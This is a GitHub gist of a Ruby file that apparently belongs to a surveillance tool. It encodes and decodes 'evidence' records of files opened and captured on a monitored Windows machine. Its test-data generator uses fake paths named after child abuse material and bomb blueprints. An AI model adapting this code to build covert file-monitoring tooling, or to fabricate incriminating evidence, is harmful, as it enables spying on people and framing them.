Last active
August 29, 2015 14:24
-
-
Save peterclemenko/fb78f8235ccdf37d76dc to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
require 'rcs-common/evidence/common' | |
require 'digest/md5' | |
module RCS | |
module FileopenEvidence | |
ELEM_DELIMITER = 0xABADC0DE | |
def content(*args) | |
hash = [args].flatten.first || {} | |
process = hash[:process] || ["Explorer.exe\0", "Firefox.exe\0", "Chrome.exe\0"].sample | |
process.encode!("US-ASCII") | |
path = hash[:path] || ["C:\\Utenti\\pippo\\pedoporno.mpg", "C:\\Utenti\\pluto\\Documenti\\childporn.avi", "C:\\secrets\\bomb_blueprints.pdf"].sample | |
path = path.to_utf16le_binary_null | |
content = StringIO.new | |
t = Time.now.getutc | |
content.write [t.sec, t.min, t.hour, t.mday, t.mon, t.year, t.wday, t.yday, t.isdst ? 0 : 1].pack('l*') | |
content.write process | |
content.write [ 0 ].pack('L') # size hi | |
content.write [ hash[:size] || 123456789 ].pack('L') # size lo | |
content.write [ 0x80000000 ].pack('l') # access mode | |
content.write path | |
content.write [ ELEM_DELIMITER ].pack('L') | |
content.string | |
end | |
def generate_content(*args) | |
[content(*args)] | |
end | |
def decode_content(common_info, chunks) | |
stream = StringIO.new chunks.join | |
until stream.eof? | |
info = Hash[common_info] | |
info[:data] = Hash.new | |
info[:data][:type] = :open | |
tm = stream.read 36 | |
info[:da] = Time.gm(*tm.unpack('l*'), 0) | |
info[:data][:program] = '' | |
info[:data][:path] = '' | |
process_name = stream.read_ascii_string | |
info[:data][:program] = process_name.force_encoding('US-ASCII') unless process_name.nil? | |
size_hi = stream.read(4).unpack("L").first | |
size_lo = stream.read(4).unpack("L").first | |
info[:data][:size] = size_hi << 32 | size_lo | |
info[:data][:access] = stream.read(4).unpack("l").first | |
file = stream.read_utf16le_string | |
info[:data][:path] = file.utf16le_to_utf8 unless file.nil? | |
delim = stream.read(4).unpack("L*").first | |
raise EvidenceDeserializeError.new("Malformed FILEOPEN (missing delimiter)") unless delim == ELEM_DELIMITER | |
yield info if block_given? | |
end | |
:delete_raw | |
end | |
end | |
module FilecapEvidence | |
FILECAP_VERSION = 2008122901 | |
def content(*args) | |
bytes = [args].flatten.first || nil | |
if bytes | |
bytes | |
else | |
path = File.join(File.dirname(__FILE__), 'content', ['file'].sample, @file) | |
File.open(path, 'rb') {|f| f.read } | |
end | |
end | |
def generate_content(*args) | |
[ content(*args) ] | |
end | |
def additional_header(*args) | |
hash = [args].flatten.first || {} | |
path = hash[:path] || ["C:\\Documents\\Einstein.docx", "C:\\Documents\\arabic.docx"].sample | |
@file = path[path.rindex(/\\|\//)+1..-1] | |
path = path.to_utf16le_binary_null | |
header = StringIO.new | |
header.write [FILECAP_VERSION, path.size].pack("I*") | |
header.write path | |
header.string | |
end | |
def decode_additional_header(data) | |
raise EvidenceDeserializeError.new("incomplete FILECAP") if data.nil? or data.bytesize == 0 | |
binary = StringIO.new data | |
version, file_name_len = binary.read(8).unpack("I*") | |
raise EvidenceDeserializeError.new("invalid log version for FILECAP") unless version == FILECAP_VERSION | |
ret = Hash.new | |
ret[:data] = Hash.new | |
ret[:data][:path] = binary.read(file_name_len).utf16le_to_utf8 | |
return ret | |
end | |
def decode_content(common_info, chunks) | |
info = Hash[common_info] | |
info[:data] = Hash.new if info[:data].nil? | |
info[:data][:type] = :capture | |
info[:grid_content] = chunks.join | |
info[:data][:size] = info[:grid_content].bytesize | |
info[:data][:md5] = Digest::MD5.hexdigest info[:grid_content] | |
yield info if block_given? | |
:delete_raw | |
end | |
end | |
end # ::RCS |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment